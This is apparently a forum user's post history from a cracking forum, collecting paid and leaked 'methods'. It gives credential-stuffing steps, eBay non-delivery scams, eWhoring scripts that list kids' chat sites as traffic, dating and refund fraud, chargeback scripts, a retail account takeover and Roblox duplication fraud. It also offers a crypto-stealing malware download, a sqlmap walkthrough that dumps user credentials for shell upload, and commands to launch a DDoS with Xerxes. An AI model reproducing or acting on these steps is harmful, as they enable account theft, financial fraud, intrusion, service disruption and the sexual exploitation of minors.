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Everything posted by Eminem

  1. HOW TO CRACK [hide]What you are going to need: - Download Sentry MBA: https://yadi.sk/d/IJqs7ZkRbnAAK - Get a Proxy list form anywhere, try the proxy section or buy some. - Get a combo list from a site , make your own (Not included in this tutorial), or buy one. - Get a Config file for Sentry MBA, the download includes a few, but not all of them are working. What to do: After you've got all the things that you are going to need to use from the above, then you are ready to go. I'd suggest making a folder on your desktop or somewhere close by, here you should put the Sentry MBA Files and the config(s). Load the config you are going to be using into sentry mba: https://imgur.com/P2oxtMk Add your proxy list, make sure that they are good and if you have purchased them, make sure that the seller doesn't say that cracking on these proxies is not allowed. https://imgur.com/efyWt31 Load in your combo list. https://imgur.com/b8wuGUD Then press start and let the magical process begin: https://imgur.com/mHj5D4z That's all there is to cracking accounts, it's really that easy! [/hide]
  2. 「︎TUT」︎Arctic's Method [hide] -[Arctic's Method]- *Please, no leaking or sharing Thank you for purchasing! :-) 1. Download this app: https://play.google.com/store/apps/details?id=com.mobilexpression.ltvpnb 2. (If you don't have a phone, use an Android emulator such as Nox) 3. Set up the app 4. Download the app on all your devices. ($5 per device, per week) 5. Enjoy easy, 100% autopilot autonomous profit. If there are any issues, DM me at THE RED MENACE#4198 (I change my discord a lot, so if that doesn't work, DM me on v3rm ArcticValor) If you enjoyed this I would really appreciate a vouch/bump. - Enjoy! :) [/hide]
  3. Quiccs Quick Money Making Method "Semi-pilot methods got a little quicker" TOS :kappa: Do not leak :kappa: :kappa: Do not share :kappa: :kappa: Do not resell :kappa: :kappa: No refunds :kappa: [hide] Introduction In this method we will go over how to make $100 or more a day autopilot on eBay with a quick setup time. For this method you will need a business paypal and an eBay account. There is a bit of a risk however but it is easy money. Enjoy the method! https://discord.gg/wM2H2xN The Method  As you know I have made a previous thread on buying with $98 that money was made with this method. So, to start off you need an ebay account that you do not care about.  You need an alt paypal. You need screenshots of a fortnite skull trooper account. You can just look up a listing for one and copy it using lightshot.  Make a listing selling the account for $130 or make a listing for $20 with the quantity at 10 (sells slower) Make sure to add your payment method as your alt paypal Add pictures and make shipping free.  Make the title clickbaity like this one https://www.ebay.com/itm/202356239642?ul_noapp=true. Make sure if they ask questions before they buy lie or tell the truth just to get their trust and to buy it  Tell them you will send them the email and password through the mail after you finish off a few games because you want to keep playing for a while when they buy. They will agree and wait til the next day.  If they ask and spam you do not reply. You get to keep the money and you should transfer it to your main paypal.  You should get $145 with taxes.  This is easy money and you can easily profit. It's not hard to earn over $1000 in a couple of days. The worst thing that can happen is your ebay account getting terminated but you can make a new one. That's it! It's as easy as that. Check in on your account every so often, about every hour to check messages, talk to potential buyers etc.[/hide]
  4. Hello! Welcome to my “Official Guide” on how to make money fast and easy. This requires absolutely no money! Let's get started! Note: This is a simple method that seems pretty stupid, but works! There's a reason I’m selling it for two dollars! If you have any questions, just DM me on Discord, and I’ll be happy to help. My Discord can be found at the top and bottom of the page. :kappa: :kappa: :kappa: **REQUIREMENTS** Time Although this method is very easy and simple to do, it does take time, and is not an auto-pilot method. Effort Just like it takes time, although this method is very easy and simple to do, it also takes effort, and is not an auto-pilot method. A Discord You will need a Discord account, which can be created at: https://discordapp.com. Creating an account is free. Internet You will need internet for this method, as you need to be able to advertise to other users online, otherwise the method wouldn’t work. A Mac Or PC This method requires a Mac or PC, because it is required in order to complete the first step of the method. Those are the only requirements for the method! [hide] here [/hide]
  5. [FREE MONEY] [HOT] BASICS OF E-WHORING [$100+ A DAY] [hide] -- General Questions -- What is eWhoring? It is a type of social engineering, that you perform the art of sexually manipulating men into giving you money in return for your body. eWhoring is generally used in chat rooms, IM, and social networks. But can find its way anywhere if done correctly. Why exactly do people eWhore? If someone is experience enough, you can make a shit ton of money from eWhoring, not even joking. People who are very experience and know what they are doing can easily make over $100 in a single night. Are any skills needed to eWhore? You will need to have some slight manipulation skills, but generally speaking you will only need a method, site of traffic, a picture pack, and as I said manipulation skills. Could eWhoring become a full time job? If you are very good at it, yes. It is possible to earn thousands weekly. However, becoming a successful eWhore can be dangerous and difficult. This is due to is being somewhat illegal, as well as good to become good at. What is a VCW? A VCW stands for virtual cam whore, and is usually a video played via Adoble Flash Player. These have several buttons called "commands" that allow the eWhorer to control the girl by pressing them, as if she was real and on webcam. In other words, it is a fake girl that seems real on camera in which you control. -- What are some general prices as well as payment methods? -- Honestly this is all up to you, if done correctly you can get away with charging any price. My recommendation is to charge around $5 for 10 pictures. A simple way of getting away with charging more for your pics, is saying your body is worth more than the other girls if questioned about the price. Guys love this for some reason. The payment method is honestly up to you, Amazon cards are the safest, but you could also take Paypal and make an alt business account to receive such funds, then transfer it to your main. If you wanted, you can ask for almost any type of payment. -- How to talk like an eWhore -- Here is a general conversation you could possibly have: Stranger: Hey, i saw you on the site You: Yeah x, wanna buy pics and sext after?x Stranger: How do i know you are real? can i have a sample? You: Sure x You: *sample* Stranger: You look very sexy You: How much are you spending?x PP Stranger: around $20 You: for $20 i can give you 30 nudes and if you buy now i can add a couple more x Stranger: Okay x You: send money to example@domain.com Stranger: money sent huney x You: *starts giving the nudes or whatever you have promised. [/hide]
  6. | Method Rating 8/10 | Saturated Rating 4/10 | Possible Earnings Weekly: $150-$800 | [hide] I'm pretty sure you know what a dating website is, they match you up with another desperate single to go on dates, however they are very unsaturated. Due to this they have a potential for eWhoring, find a "smaller" dating website, which isn't advertised on TV 24/7 and is somewhat free. For a dating website you will need to come up with a rather big profile for this "girl" or some websites even ask for you to scan your ID now. But once you match, or find guys. Act desperate as you have no way to get to your date, maybe your car broke and needs repairs, or you need gas money. Ask if they can send you the money on Paypal, or as an Amazon gift card as you can get gas gift cards from Amazon. If they do, simply say you will be there and never show.[/hide]
  7. Method Rating: 8/10 | Saturated Rating: 9/10 | Possible Earnings Weekly: $300-500 | [hide] If you have heard of the messenger app called Kik for many devices, you should know it is an incredibly famous app across the world. This mean, it is a host spot for pedophiles and horny guys. To get started on Kik, you will need Bluestacks: http://www.bluestacks.com/#gref You will at least need 2GB of RAM just for Bluestacks to run! Once you have this installed, install the "Fake Camera" app from the play store on Bluestacks. It will look like this: https://gyazo.com/71c7edd3d90ddc9e8c7a91ddc4692408 Once that is done, you will need to download an older Kik APK to use on Bluestacks so the Fake Camera app will work. Once downloaded, you will want to install the APK by clicking the APK icon on the left toolbar. This icon will look like this: https://gyazo.com/9b732af6c951d36598ec4bc859d060ad Once all of this is done, you can get started. You will need a picture pack, you can get your own within the free picture pack text document. -- Traffic Sites -- kikhorny.com kiksexting.com kikfriendfinder.co.uk kik.me sexting.com findkikfriends.com kiked.com sextingforum.net sextbuddies.com kik-sexting.com hornysexting.net localsexting.com kikusers.com kikfriender.com kikfinder.com sextfun.com sextingonkik.com [/hide]
  8. [FREE MONEY] [HOT] How to make money easily [$100+ a day] [hide] Honestly chat rooms are a good place to advertise any method, lets say you want more Skype traffic. Advertise that by saying that you are in need of someone to talk to on Skype, and you may offer pics. Once done, offer your deal and come up with some sob story on why you need money. -- Traffic Sites -- adultchat.net teenchat.com omegle.com chatroulette.com javachatrooms.net kidschat.net chat-avenue.com [/hide]
  9. | Method Rating 7/10 | Saturated Rating: 5/10 | Possible Earnings Weekly: $200-1000 | [hide] Skype is a very well known IM, as well as voice calling. There is a huge market for eWhoring on Skype, however you will need a VCW, not a picture pack. These are much harder to find but potentially make 2x more profitable than a simple picture pack. To get started download Skype from Skype.com and install it. Once done create an account, remember sexy but innocent. You will also need Manycam: https://manycam.com/ If you need help with learning how to set this up completely, watch this video: -- Traffic Sites -- addmecontacts.com collarspace.com localsexting.com sextingusername.com sextingforum.net bestusernames.com[/hide]
  10. [align=center]| Method Rating: 6/10 | Saturated Rating: 7/10 | Possible Earnings Weekly: $50-300 | [/align] [hide] Snapchat is an app that allows you to send pictures for a timed amount to customers. This is a good thing, as the app is based around pictures, when eWhoring itself is mostly about sending pictures. Although it is harder to find buyers on Snapchat as it is much harder to keep the conversation going. To get started on Snapchat, you will need Bluestacks: http://www.bluestacks.com/#gref You will at least need 2GB of RAM just for Bluestacks to run! Once done, install Snapchat on the Bluestacks play store. Be sure to make a sexy girl account, but make it look somewhat innocent. Do not put nudes as your PFP. When this is done, find a PFP and look at more methods to learn tips and tricks. The downfall of this method is very little people want to buy your nudes on Snapchat. -- Traffic Sites -- sextingusername.com findsnapchatusernames.com sextingforum.net kiksexting.com snapchatsexters.com kiksnapme.com snapchatsex.ne findsnapchatfriends.com snapchatbuddy.com findsnapchatusernames.com sextfun.com sextwithme.net patch.com bestusernames.com [/hide]
  11. Thank you for viewing my post on Cracked.to forum. You've made a great decision doing so. With this ebook in your hands, you pretty much already have money in your bank. Why? Because in the next few minutes, I will show you EXACTLY how to make $100 (or more) within 24 hours easily. This can be repeated over and over again as many times as you want. Now, this is not another one of those “get rich quick” ebooks that promises you to become a millionaire overnight, nor is it a guide to building a six-figure business. What this ebook WILL teach you is how to make some extra bucks on the side the easy and lazy way, which you can use to buy a new gadget, pay off some debt, or eat out at a nice restaurant. Follow each step EXACTLY and I guarantee you will earn $100 or more within 24 hours or less Why couldn't you? What you need: ⦁ A computer ⦁ A mobile device (Android or iOS) ⦁ An internet connection ⦁ Paypal account [hide] Step 1: USING YOUR MOBILE DEVICE, type in the following to your browser exactly, and go. [ HERE] Step 2: You will be redirected to a page similar to the one below. Click “Start earning rewards”, then click “Continue”, after that click “Download now”. Step 3: You should be redirected to Play Store. Install the app to your smartphone. Enter your Paypal email address. Step 4: Open the app (Featurepoints). Click “Earn More”. You should see something like below. Step 6: Type your link to Notepad on your computer. Step 7: Go to the link below to download the editable version of this eBook. https://www.mediafire.com/file/mlfyi1i6sz7too4/200in24hours.docx Replace [ENTER YOUR LINK] with the link you typed in Notepad. Save the document. Step 8: Go to http://www.pdfonline.com/convert-pdf/ and convert the saved document to PDF. Step 9: Share the PDF everywhere! I'd recommend sharing it on internet marketing forums. Below is a list of forums to share the PDF on: http://warriorforum.com http://www.ukbusinessforums.co.uk/forums/ http://www.blackhatworld.com/ https://forums.digitalpoint.com/ http://www.webmasterworld.com/ http://www.wickedfire.com/ http://www.v7n.com/forums/ http://forums.seochat.com/ http://www.affilorama.com/forum/ http://www.cpaelites.com/ http://www.affiliatefix.com/ For more points, share the PDF with your friends as well. Very soon, they will share it with their friends too! Step 10: Now sit back, relax and watch as your points roll in! Once you have over 120,000 points, cash out by clicking Rewards, then Paypal. Bam! Easiest $200 ever! I took it a step further, shared the PDF to 100+ websites and managed to earn around $500+ in less than 24 hours! Bam! Easiest $100 ever! I took it a step further, shared the PDF to 100+ websites and managed to earn around $500+ in less than 24 hours! [/hide]
  12. [hide] 1- https://keywordtool.io/google 2- https://app.neilpatel.com 3- https://lsigraph.com 4- https://www.mykeyworder.com [/hide]
  13. You can customize the type of currencies you want to steal, you need to put your adress, the currencie you want to steal and spread it. DOWNLOAD [hide] HERE [/hide] VIRUSTOTAL [hide] HERE [/hide] [align=center]Basic Properties MD5 c46a778011b1ef8758bfa656c71813af SHA-1 b75de49fd64e124fd8ecbb25bbebe5c53d021c58 Authentihash c9503d047d51dcb8743618f47a0d0bbde8b28f859ecc0cbabbdaa5fc8a04276c Imphash f34d5f2d4577ed6d9ceec516c1f5a744 File Type Win32 EXE Magic PE32 executable for MS Windows (GUI) Intel 80386 Mono/.Net assembly SSDeep 768:tRe3OvsgaRSKbP4lDOQvuxxXwavb/FnqHqQEjCTqx:Te3OvZySKbP4gQAXFbdnrQE+T+ TRiD Generic CIL Executable (.NET, Mono, etc.) (81%) Win32 Dynamic Link Library (generic) (7.2%) Win32 Executable (generic) (4.9%) OS/2 Executable (generic) (2.2%) Generic Win/DOS Executable (2.2%) File Size 35 KB [/align]
  14. PHP code generator. Build visually appealing web interface for any local or remote MySQL, MS Access, SQL Server, Postgre and Oracle databases. DOWNLOAD [hide] HERE [/hide] VIRUSTOTAL 0 / 57 [hide] HERE [/hide]
  15. OTHER LEAK E-BOOK :kek: [hide] https://anonfile.com/yaj4l6t4na/Vyrez_new_bonus_file_2_pdf [/hide]
  16. OTHER LEAK E-BOOK :kek: [hide] https://anonfile.com/x1jdldtenc/Vyrez_new_bonus_file_1_pdf [/hide]
  17. OTHER LEAK METHOD btw : Also here's the method and the best way to win Unauths and Item not received... [hide] Item Not Recieved: Screenshot EVERY trade and keep track of what prices you sell items for so you can remember if someone cbs you down the line. When the CB occurs screenshot your notes and the trade and send that over into paypal and say exactly what is said here. Also, make them put their username in the note The user had recieved the given item and I have provided picture proof. (Uploaded picture/link to picture) After the item was sent to the user it is up to the seller to give a warranty for the item to said buyer and this was not provided resulting in a loss/disfunctionality in the item is nonreturnable and nonrefundable thus causing this ChargeBack being false and resulting in my party to be the winner. Unauth: essentially same as Item not recieved but slightly different (still need screenshots) The buyer had recieved the given item digitally (proof of trade here) and hadn't shown any red flags of being a compromised paypal. If the paypal is compromised I refuse a refund unless I receive the sold item or am compensated the money from PayPal. If there have been no seen or known compromised I highly suggest checking any other IP addresses that have accessed the account. If the address is the same of the original owner of the ChargeBacker this will result in a fraud case and I can and will file a police report and upload proof of said police report. You don't really need a police report just increases your chance of winning [/hide]
  18. OTHER LEAK METHOD :kek: [hide] Option # 1 : Account Takeover So starting off, you will want to clear your cookies and history using CCleaner or a similar program, and use a Virtual Private Network (VPN) just to be on the safe side. Log into the account, and make your way to the details of the accounts holder. It is in the top right corner of the screen If you click on the "Payment Methods" and then "Gift Cards" it will show you the balance on the top left of the accounts currently available balance from the attached gift card The first thing you will want to do is change the email of the account. I use Protonmail, since it not only seems to be relatively secure with its encryption and privacy policies, but also because the accounts are easy to make, you do not need to link a phone number up to it, and you can make pretty OG accounts. This will prompt a screen alerting you that changing the email will remove all payment methods which is fine, it only is referring to the linked credit cards, which we don't care about anyways After that, go through and delete the accounts "Preferred Shipping Details" and pretty much just change all the information to your information. If you have a fake ID, use that information, but otherwise you can leave everything vague Once you have erased the previous accounts holders details and made sure to unlink from any social media (Rarely Ever Done) you are good to start shopping Navigate to "Find your Store" and change the details to whatever store in nearest to you, or whichever you want to pick up the items from Shop around the site, and make sure that each item you pick has the "Available for Pickup" Option # 2 : Ninja That Shit If you would rather not do the full takeover, you can simply shop on the account, and when you place the order, there will be option in one of the last stages of checkout to "Have Someone Pickup for Me" You simply need to enter your name, and your email address, and then place the order This is kind of up to you which method you choose, so its a personal preference about the level of anonymity and the chance you want to take of the account holder noticing the purchase when they receive the emails Option # 3 : Reship or Drop Address The only shitty thing is that while most of the items are available to pickup in store, the only things which you cannot pickup in store are the Nooks & Tablets. In order to purchase these, you will need to use either a reship, or send it to a drop location that you have established as a safe place which will not raise suspicion when you have to go and physically grab the arrived items Picking Up Your Items This is honestly the easiest part. After you place the order, in about 15-minutes you will get an email notification that your item is ready to be picked up. You are instructed to bring a government issued ID, and the bar-code attached to the confirmation email for them to scan I never once have been asked for anything other than my name when it is my turn in line, even though I have had my ID and phone out ready to go. They don't seem to give a fuck, and this has been at about eight different locations. They pack it all up in a bag, and say "have a nice day!" and continue with their lives. Covering your Tracks By habit, I always try and remain as safe and anonymous as possible, so after successfully picking up or receiving my item, I will sign back into the account, delete all my deletes, and enter some random information, or even the account holders info which I removed. --- This is up to you if you want to do this last step. Well that is it! Not much too it, and very little risk involved in it. As a precaution, it is not a bad idea to have a backup story in case shit hits the fan, and I would say something along the lines of, "I purchased discounted Barnes & Noble Gift-cards from a seller on Craigslist, and they sent me this account with my details, and I simply placed my order and have no idea what the fuck is going on." Just play retarded, but I highly doubt it will ever happen. You are buying books, not computer systems or really high-ticket items. Thanks and Good Luck, and message me for anything you may need ![/hide]
  19. Arctic's Free In App Purchases Method Thank you for purchasing. *Please, no leaking or sharing.* :kappa: Tired of Giant Corporations seperating you and your hard earned dough? Well fear no more! Arctic's method will show you how to get "free in app puchases", without haciking or exploiting, and through legal means, saving you untold amounts of money. *PLEASE READ ALL THE WAY THROUGH* Requirments: - An android/emulator - Wifi - A bit of money - Google Play Gift Card (Reccomended, but not nescessary) - An IQ Higher than a potato - 10 Miuntes, on average [hide] 1. Open up the app. 2. Purchase what you desire. ("WHAT?? I've been scammed!11 OMG LIES!!1", I'm not through talking listen up.) 3. Go to this link: https://play.google.com/store/account 4. Find the item you purchased. 5. Click the three dots on the item, and select "Report A Problem" https://gyazo.com/0cc158120f5dee056034f2cd98767294 6. Select "Accidental Purchase" from the dropdown. 7. In most all cases, your gmail will get an email saying your refund has been approved. 8, Wait for the refund, (If you used a google play gift card, refunds are instant.) *Otherwise, refunds will take a few days. (2-3) It depends on the payment method. 9. Recieve your money. 10. Repeat as needed and enjoy. [/hide]
  20. ISCLAIMER: This tutorial is purely for educational purpose RAP GOD AKA EMINEM is not responsible for any blackhat act of any subscriber.With that said lets start the tut. Sql injection: SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). [hide] Types of Sql injection. 1-Union-Based SQL Injection It is the most popular type of SQL injection. This type of attack uses the UNION statement, which is the integration of two select statements, to obtain data from the database. 2-Error-Based SQL Injection An error-based SQL injection is the simplest type; but, the only difficulty with this method is that it runs only with MS-SQL Server. In this attack, we cause an application to show an error to extract the database. Normally, you ask a question to the database, and it responds with an error including the data you asked for. 3-Blind SQL Injection The blind SQL injection is the hardest type. In this attack, no error messages are received from the database; hence, we extract the data by asking questions to the database. The blind SQL injection is further divided into two kinds: a. Boolean-based SQL injection b. Time-based SQL injection The above techniques can be used to obtain the data in the database by either asking a question or inducing a time delay. in this tut we perform sql injection with sqlmap a tool in kali linux. lets start.. commands are enclosed in sqaure bracket [] Boot into your Kali linux machine. Start a terminal, and type - [ sqlmap -h ] It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command sqlmap -u . In our case, it will be- [ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 ] So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like - [ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs ] So lets say there are two databases acuart and information_schema. we get tables of a particular database.So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be- [ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables ] This should list all available tables in the particular database. Now we we get columns which usually contain the data of our interest, this data could be login credential,credit card info,and most important admin login used for shell upload and site defacement. Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The final command must be something like- [ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns ] This should list all available columns in the particular table. Now the rest is to dump the sensitive data from the database. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this. [ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump ] SO that's it. [/hide]
  21. Vulnx is a cms and vulnerabilites detection, an intelligent auto shell injector, fast cms detection of target and fast scanner and informations gathering like subdomains, ipaddresses, country, org, timezone, region, ans and more ... [hide] https://github.com/anouarbensaad/vulnx [/hide]
  22. A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable by overwhelming it with traffic from multiple sources. They target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information. You can do DDOS attack via termux, using package Xerxes [hide] STEPS:- 1] Open termux app and execute command **apt update && apt upgrade -y** 2] Next package **apt install git && apt install clang -y** 3] Now, clone **git clone https://github.com/zanyarjamal/xerxes** 4] cd xerxes 5] Execute this command **clang xerxes.c -o xerxes** 6] Now Done, You can launch Ddos attack with this command **./xerxes your_website_url 80** [/hide] You are done with DDOS attack and this tutorial is only for enducational purpose
  23. **WARNING: THE FOLLOWING METHOD IS UNTESTED! I AM NOT RESPONSIBLE IF THIS DOES NOT WORK!** [align=center]Cyber's Prototype Limited Duplication Method Conditions: - No Leaking/Sharing :kappa: - Leave a Vouch & Bump - I am not responsible if you get yourself into a shit storm - The "Scammer" account, is almost sure to be terminated - No chrgebacking - No refunds - Enjoy the method! Prerequisties: 1, A brain 2. An email + Aliases 3. A VPN 4. An Internet connection 5. Virtual Machine + TOR? 6. Roblox BC Accounts ("Victim", "Scammer", "Buyer", "Owner") 7. A functioning computer[/align] [hide] Steps: 1. Use the VPN+TOR+VM for all the steps below 2. Log into the "Victim's" Roblox account. 3. Transfer items/currency 4. If limiteds, then use the "Buyer's" account to "Purchase/Trade" the limited. Attempt to make it look legit. 5. Using the robux from the "Sale", go to the "Buyer's" account and make a group. 6. Upload a shirt or something, put it on sale. (If you're going for maximum stealth, make a ton of clothes, that are like 70 robux each, and buy em all. it'll take a while and you will lose some robux however..) 7. "Buy this item from the "Scammer's" account. 8. Transfer ownership of group from "Buyer" account, to "Owner" account. 9. Use the owner account to withdraw funds. 10. From the "Victim's" account, (Using the victims email), contact Roblox, Saying someone stole all your shit. 11. Roblox *SHOULD* do a "One time restore* 12. Enjoy your free shit Backup Protocol Problem: Roblox asks for original billing address and you don't have it? Solution: Social engineer. (Ex: "I haven't used email for ages..." "My uncle bought it for me, he's deployed in --------- right now" "My -------- who bought this is now dead".) Problem: Roblox bans/withdraws limiteds from "Buyer" account Solution: Social engineer, In this case, it is very important to sound clueless. (Ex: "Why are my limiteds gone/account banned???!!) And if they say something about the limiteds being stolen, throw a fit. (Ex: "I want a refund!" "This isn't fair, I paid for those!!" "How was I supposed to know it was stolen!!??") If none of those work, then use an alias email, and pretend to be angry parent, since Roblox likes their money. (Ex: "I DEMAND TO SPEAK TO A REPRESENTATIVE!" "This is unjust! I paid money and you robbed my son/daughter of it!") [/hide]
  24. How's Moneymaking E-Book v2 | Earn Cash Daily & Fast Hi! I'm glad you decided to join us on our second journey. As mentioned, our previous ebook was unfortunately leaked. I have a series of unexpressible emotions right now as something I spent hours into and only updating for about a day was leaked. People are using the excuse "If he put in hard work then why is it $0.50?" If there was any smart faith that was transitioned from my original ebook thread, people would realize that I made it $0.50 beacause I wasn't looking for profit. I was looking to help others out, to get them away from this horrible position that they're in. Not everything that needs to be sold here on Vermillion needs to be just for money, and if that's going to be your excuse for leaking hard work then leave. :kek: :kek: :kek: :kek: :kek: :kek: :kek: :kek: :kek: :kek: :kek: :kek: [hide] Aside from my anger, what's really impressing to me and other people is that I'm able to be motivated and write another ebook that could potentially get leaked. I'm able to get back up from a terrible thing and I also am able to do this because of the motivation that other people gave to me. I want this to be a case of me being a role-model to you guys; when something or someone makes you fall hard, don't stay on the ground, you get back up and keep on running. Method 1: When I started out on Vermillion, I had two sources of income. This is a great idea especially if you want to look into funding a project or future investing. My main source of income was to purchase accounts for cheap and resell them for higher. This was the case for a lot of people, but the question that people ask today is "How can I start?". Starting and getting the ball rolling is definitely the hardest part to becoming successful. You don't have anything at all and asking for free items & products might just seem like a waste of time. Well, you do have resources. There are leaked programs such as AccountReaper which you can use highly to your advantage to start a small income and get the ball rolling. I reccomend starting a service where you will "smash" accounts for a small comission fee. This means that you will grab a combo lists and start smashing for free Spotify Premium Accounts. You can either turn this into a service or resell each account individually. However, make sure the cost for this service isn't abot $0.25, as Spotify Premium Accounts tend to be one of the easisest accessible resources there. You can also try other types of accounts such as Pandora, Fitbit, Domino, Minecraft, PornHub, Brazzers. These are all accounts Vermillion members will pay for if there is a certain valued subscription or membership on it. Once establishing a foundation for this service, begin to offer special discounts for users who purchase accounts in bulk. For example, let's break this fundamental down. I charge $0.10 per Spotify Premium Account. I have a user who is wanting 35 Spotify Premium Accounts. In total, his final cost would be $3.50. However, I want to give him a 50% discount for each amount of accounts that exceeds over 20. So since he wants 35. So, he will only pay the real cost of the accounts for 15 accounts, but the rest of the 20 accounts he will pay $0.05 since I'm offering him a 50% discount. His total cost would end up being $2.50. With that discount, my customer has saved a full $1. It may be a little bit tricky to get the hang onto, but it will be worth it because your long-time customers (ones who purchase in bulk) must always be happy so they can always rely on you for their stock. But please remember to not treat any customer a different type of care from your service. I believe this is a rather rude act and will get you some negative attention. This method is not going to be your real money method. This method is to start you out with some cash in order to fund any future services that you may have. This method also does not just apply to beginners, it applies to everyone as it is a huge help for anyone coming back from scratch or a scam. Method 2: Do you enjoy writing, entertaining and making money at the same time? Well this is the perfect method for you. About 10% of Americans who use the internet today own a blog, and only 4.1% of those Americans are actually profiting out of their blogs. Why don't you come and join that 4.1%? Starting a blog is easy, but in order to make money, you'll need to create an actual website. Using Weebly, Wordpress or Wix is fine, but as you progress in the future, you'll want to have your own site. You can do thise by learning off of YouTube tutorials or if you have the money, hire a web developer to make on for you. Other than that, the key to making money with this method is allowing people to post advertisements on your site. This is beneficial because both the advertiser (you) and the person asking you to advertise will earn a comission. Basically, the ad buyer can pay you from sales or pay you per week/month. Keep in mind that most buyers will tend to increase/decrease pay based on daily revenue. So while you are advertising other people's items, make sure you are advertising your site as well. Also, please note that the revenue you make and the advertiser makes should always be a 50% split between the both of you. If an ad buyer is attempting to raise the percentage of splits they get on their side, decline their offer. This is used often as a marketing tactic but it is one of the old tricks in the book and can be easily avoided. Say that the deal is going to be fair or nothing. Don't be sad if the buyer leaves, you could've potentially lost money. If you do end up finding a good ad buyer, make sure to contact with them on a reuglary basis to report data statistics about your site and how much impressions their ad(s) are getting. This step isn't needed, but it is more than great to include it in as good service will ALWAYS bring you more profit. Once you've successfully completed one ad deal, this is around the time where you want to start having multiple ad buyers and advertisements on your site. Alongside your blog revenue, you'll be making money as a secondary source. Remember affiliate marketing? That process can be used on your blog as well! If your blog has a decent amount of followers, advertisements running, and you hungry for more money, use affiliate marketing as your third source of income. If you don't remember how to do it, affiliate marketing is where someone will allow you to advertise their product or service for a small comission fee or a split of the revenue. This is great to put on your site as it's your blog and you can go as in-depth and detailed as possible when making posts about products & services. With this method, you can create up to 3 sources of income from one site. If you're really looking to get into blog income and make this process a primary source of profit, then don't hesitate to have multiple sites up. The more the better, but please make sure that you are equally diving your attention across all sites or you'll start to notice a drastic drop on some sites. I don't reccomend owning & managing more than 3 sites by yourself. You can hire a trusted friend of yours and maybe offer them a small comission fee (5%) for doing your work. Thanks again for giving this ebook a second chance. It's been a fun journey on the last ebook, but it's time to move on and continue onto an even better one! We thank you again for purchasing and if you have any questions remember that How offers 24/7 support as apart of his Standard ebook package. Feel free to contact him on Discord: Dan#1552. Also, stay tuned for more ebooks, methods & a mega-ebook coming sometime this month! Thanks again and best of luck with your journies! [/hide]